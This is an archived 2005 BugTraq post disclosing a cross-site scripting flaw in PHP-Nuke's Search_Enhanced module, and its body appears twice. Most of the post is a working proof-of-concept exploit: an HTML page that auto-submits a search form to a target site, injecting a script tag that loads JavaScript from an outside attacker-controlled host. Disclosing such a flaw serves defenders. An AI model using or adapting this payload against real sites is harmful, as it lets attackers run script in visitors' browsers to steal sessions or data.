BugTraq
Back to list
|
Post reply
PHP-Nuke
Sep 05 2005 03:40PM
bhfh walla com
PHP-Nuke
Search Cross-Site Scripting Vulnerability
Vulnerable: i think all ver.
data:2005-09-5
exploit :
#openme.htm ::
<html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=
index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>
thanks , B~HFH.
email : bhfh (at) walla (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Search Cross-Site Scripting Vulnerability
Vulnerable: i think all ver.
data:2005-09-5
exploit :
#openme.htm ::
<html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=
index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>
thanks , B~HFH.
email : bhfh (at) walla (dot) com [email concealed]
[ reply ]